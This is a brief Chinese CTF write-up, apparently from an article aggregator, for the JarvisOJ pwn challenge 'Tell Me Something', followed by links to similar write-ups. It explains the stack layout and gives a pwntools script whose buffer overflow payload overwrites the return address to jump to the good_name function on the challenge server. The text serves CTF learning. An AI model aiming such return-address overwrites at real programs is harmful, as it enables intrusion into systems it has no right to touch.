JarvisOJ PWN

程序员文章站 2022-05-16 22:30:22

...

Tell Me Something

使用checksec查看保护机制：
JarvisOJ PWN
开启了NX保护（栈不可执行）
关键在于理解栈帧结构，找到good_name的地址后。
过程中遇到一个疑问，为什么payload是’a’*0x88+add而不是’a’*0x90+add，即为什么没有oldebp。
看汇编：

并没有oldebp出栈的操作。

payload：

from pwn import*
r=remote('pwn.jarvisoj.com','9876')
print r.recvline()
pad='a'*0x88
add=p64(0x400620)
payload=pad+add
r.sendline(payload)
print payload
print r.recvline()
print r.recvline()

题目文件

JarvisOJ PWN

Tell Me Something

bugku 里面的五个pwn题wp

jarvisoj——[XMAN]level2

jarvisoj pwn level系列

jarvisoj——[XMAN]]level2(x64)

level2 [XCTF-PWN]CTF writeup系列6

jarvisoj level3

buuctf jarvisoj_level0

JarvisOJ basic部分WriteUp

linux kernel pwn学习之hijack prctl

[Pwn]格式化字符串漏洞--2018科来杯 repeater